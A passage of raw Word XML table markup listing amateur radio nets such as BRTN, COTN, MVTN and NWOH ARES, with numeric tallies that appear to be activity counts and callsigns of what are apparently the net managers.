              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>N/M</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="7531584F" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3A1B3CD4" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> BRTN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="990" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="41F96D67" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">  163</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1070" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="18E6E0D6" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1140" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C4C321A" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>429</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="422B10C6" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1457" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="092F4331" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> W8DJG</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="78AE8162" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0115C0AB" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> COTN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="990" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3A8D1E3D" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>265</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1070" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="52CDD3E4" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1140" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3D46ACF1" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>476</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5B656E98" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1457" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D509D46" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> KD8TTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="5883EE14" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59A68F93" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> MVTN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="990" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65DEE7B9" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1070" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="336C7E92" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1140" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="64408320" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="19F34588" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1457" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="24BF4342" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> KC8HTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="2A0A284F" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="58514A75" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> NWOH ARES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="990" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="41A25880" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>274</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1070" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0C29F2DB" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>154</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1140" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4056728E" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>459</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4F7597DD" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1457" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6D4FD0CD" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> N8TNV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="58A2C82D" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="62B91E76" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> TATN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="990" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="72D284CF" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
